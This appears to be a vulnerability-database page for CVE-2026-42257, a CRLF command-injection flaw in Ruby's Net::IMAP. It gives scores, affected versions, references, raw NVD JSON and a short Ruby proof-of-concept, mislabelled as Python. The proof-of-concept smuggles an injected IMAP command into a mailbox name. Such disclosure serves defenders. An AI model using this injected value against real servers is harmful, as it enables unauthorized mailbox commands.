CVE-2026-42257

Description

Net::IMAP implements Internet Message Access Protocol (IMAP) client functionality in Ruby. Prior to versions 0.4.24, 0.5.14, and 0.6.4, several Net::IMAP commands accept a raw string argument that is sent to the server without validation or escaping. If this string is derived from user-controlled input, it may contain contain CRLF sequences, which an attacker can use to inject arbitrary IMAP commands. This issue has been patched in versions 0.4.24, 0.5.14, and 0.6.4.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:ruby-lang:net\:\:imap:*:*:*:*:*:ruby:*:* - VULNERABLE

Ruby Net::IMAP < 0.4.24

Ruby Net::IMAP < 0.5.14

Ruby Net::IMAP < 0.6.4

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

require 'net/imap'

# Example of vulnerable usage
# Attacker controlled input containing CRLF sequences
payload = "INBOX\r\nA001 LIST \"\" *"

imap = Net::IMAP.new('imap.example.com')
imap.authenticate('PLAIN', 'username', 'password')

# Vulnerable command: passing raw user input to a command that doesn't sanitize
begin
  # The injected CRLF causes the server to process the LIST command
  imap.select(payload)
  puts "Payload sent successfully"
rescue => e
  puts "Error occurred: #{e.message}"
ensure
  imap.disconnect if imap
end

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-42257
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-42257
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-42257/
[4] VulDB https://vuldb.com/cve/CVE-2026-42257
[5] https://github.com/ruby/net-imap/releases/tag/v0.4.24
[6] https://github.com/ruby/net-imap/releases/tag/v0.5.14
[7] https://github.com/ruby/net-imap/releases/tag/v0.6.4
[8] https://github.com/ruby/net-imap/security/advisories/GHSA-hm49-wcqc-g2xg

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-42257", "sourceIdentifier": "[email protected]", "published": "2026-05-09T20:16:28.463", "lastModified": "2026-05-18T17:59:37.693", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Net::IMAP implements Internet Message Access Protocol (IMAP) client functionality in Ruby. Prior to versions 0.4.24, 0.5.14, and 0.6.4, several Net::IMAP commands accept a raw string argument that is sent to the server without validation or escaping. If this string is derived from user-controlled input, it may contain contain CRLF sequences, which an attacker can use to inject arbitrary IMAP commands. This issue has been patched in versions 0.4.24, 0.5.14, and 0.6.4."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:P/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.8, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-77"}, {"lang": "en", "value": "CWE-93"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ruby-lang:net\\:\\:imap:*:*:*:*:*:ruby:*:*", "versionEndExcluding": "0.4.24", "matchCriteriaId": "05DB8FF3-7546-470A-BBB4-4DCAEAD83D6F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ruby-lang:net\\:\\:imap:*:*:*:*:*:ruby:*:*", "versionStartIncluding": "0.5.0", "versionEndExcluding": "0.5.14", "matchCriteriaId": "2CCEB891-1D8F-4431-A79C-2A7560A84F4E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ruby-lang:net\\:\\:imap:*:*:*:*:*:ruby:*:*", "versionStartIncluding": "0.6.0", "versionEndExcluding": "0.6.4", "matchCriteriaId": "9A6D1995-BFA3-490F-967D-252CA7BE2264"}]}]}], "references": [{"url": "https://github.com/ruby/net-imap/releases/tag/v0.4.24", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/ruby/net-imap/releases/tag/v0.5.14", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/ruby/net-imap/releases/tag/v0.6.4", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/ruby/net-imap/security/advisories/GHSA-hm49-wcqc-g2xg", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}]}}